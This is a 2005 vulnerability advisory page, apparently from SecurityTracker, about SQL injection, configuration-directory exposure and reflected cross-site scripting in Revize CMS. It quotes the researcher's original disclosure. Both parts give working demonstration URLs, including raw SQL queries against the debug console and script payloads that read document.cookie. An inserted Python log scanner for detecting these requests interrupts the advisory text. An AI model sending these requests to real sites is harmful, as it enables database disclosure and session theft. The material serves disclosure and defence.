SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Forum/Board/Portal)  >   Revize CMS
Vendors:   Idetix Software Systems
Revize CMS Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1015231
SecurityTracker URL:  http://securitytracker.com/id/1015231
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Nov 16 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  

Description:   Lostmon reported a vulnerability in Revize CMS. A remote user can inject SQL commands and conduct cross-site scripting attacks.

The 'query_results.jsp' script does not properly validate user-supplied input in the 'query' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/revize/debug/query_results.jsp?webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects

http://[target]/revize/debug/query_results.jsp?query=select%20*%20from%20pbpublic.rSubjects

http://[target]/revize/debug/query_input.jsp?table=rSubjects&apptable&webspace=REVIZE

A remote user can supply the following URLs to obtain some information about the target site:

http://[target]/revize/debug/apptables.html

http://[target]/revize/debug/main.html

A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Revize software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap=subject&error=admincenter/login.jsp

http://[target]/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=security&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&error=admincenter/login.jsp

http://[target]/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=login&resourcetype=security&objectmap=subject&error=admincenter/login.jsp

A remote user can request the following URL to view potentially sensitive system information:

http://[target]/revize/conf/
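As an added detection example (not part of this advisory, and not code from the Revize product), the following Python scans web-server access-log lines for the three request shapes described above: the debug query console receiving a raw SQL statement, direct access to the conf directory, and script markup reflected through HTTPTranslatorServlet parameters. The log lines are constructed samples with made-up IPs, and the indicator names are my own labels.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format). The request
# targets mirror the URL shapes described in the advisory; IPs are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Nov/2005:10:01:02 +0000] "GET /revize/debug/query_results.jsp?webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects HTTP/1.1" 200 5120
10.0.0.5 - - [16/Nov/2005:10:01:09 +0000] "GET /revize/conf/ HTTP/1.1" 200 812
10.0.0.6 - - [16/Nov/2005:10:02:11 +0000] "GET /revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap=subject&error=admincenter/login.jsp HTTP/1.1" 200 2048
10.0.0.7 - - [16/Nov/2005:10:03:00 +0000] "GET /revize/index.jsp HTTP/1.1" 200 4096
10.0.0.8 - - [16/Nov/2005:10:03:30 +0000] "GET /revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=security&objectmap=subject&error=admincenter/login.jsp HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Crude markup check applied to each URL-decoded parameter value.
SCRIPT_RE = re.compile(r'<\s*script|javascript:|on\w+\s*=', re.IGNORECASE)


def classify(target):
    """Return the list of indicator names matched by one request target ([] if clean)."""
    parts = urlsplit(target)
    path = parts.path
    params = parse_qs(parts.query, keep_blank_values=True)  # values are %-decoded here
    hits = []
    if path.startswith('/revize/debug/'):
        hits.append('debug-console-access')
        if path.endswith('/query_results.jsp') and 'query' in params:
            hits.append('debug-sql-query')  # raw SQL handed to the backend
    if path.startswith('/revize/conf'):
        hits.append('config-dir-access')   # conf directory / revize.xml exposure
    if path.endswith('/HTTPTranslatorServlet'):
        if any(SCRIPT_RE.search(v) for vs in params.values() for v in vs):
            hits.append('reflected-xss-payload')
    return hits


def scan(log_text):
    """Parse log lines and return one finding dict per request that matched an indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        hits = classify(m.group('target'))
        if hits:
            findings.append({'ip': m.group('ip'), 'time': m.group('ts'),
                             'target': m.group('target'), 'indicators': hits})
    return findings
```

The fifth sample line is a legitimate login request through the same servlet and is deliberately not flagged, so the check keys on reflected markup rather than on the servlet path alone.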

The vendor was notified on November 14, 2005.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Revize software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.idetix.com/
Cause:   Access control error, Input validation error
Underlying OS:  Java, Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Revize(r) CMS SQL information disclosure and XSS

The Revize(r) Web Content Management System enables
non-technical content contributors to quickly and easily
keep their Web Pages up-to-date. Revize can be applied
to a sophisticated, mature site or to the development of
a new Web Site from the ground up. And Revize is powerful
enough to manage Web content for any large organization.
Or, Revize can be localized into one or more departments.

The input passed to the "query" parameter in "query_results.jsp"
isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

This may allow a remote attacker to execute or manipulate SQL
queries in the backend database.

A remote user can obtain sensitive data about the target
system if the attacker requests ' revize.xml ', located in the
' conf ' directory, directly... the normal URL for this flaw is:
http://[victim]/revize/conf/

#################
version
#################

unknown version of Revize(r) CMS

##################
solution
##################

No solution at this time.

###################
Timeline
###################

Discovered: 02-11-2005
vendor notified: 14-11-2005
vendor response:
disclosure:16-11-2005

#######################
examples
#######################

SQL command:

http://[Victim]/revize/debug/query_results.jsp?webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects

http://[Victim]/revize/debug/query_results.jsp?query=select%20*%20from%20pbpublic.rSubjects

http://[Victim]/revize/debug/query_input.jsp?table=rSubjects&apptable&webspace=REVIZE


http://[Victim]/revize/debug/

When we are at this URL, the page has a login form for
access, but if we click on any link we can obtain some


http://[Victim]/revize/debug/apptables.html
http://[Victim]/revize/debug/main.html

#####################
cross site scripting
#####################

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap=subject&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=security&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=login&resourcetype=security&objectmap=subject&error=admincenter/login.jsp



Thanks to estrella for being my light

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....

Copyright 2019, SecurityGlobal.net LLC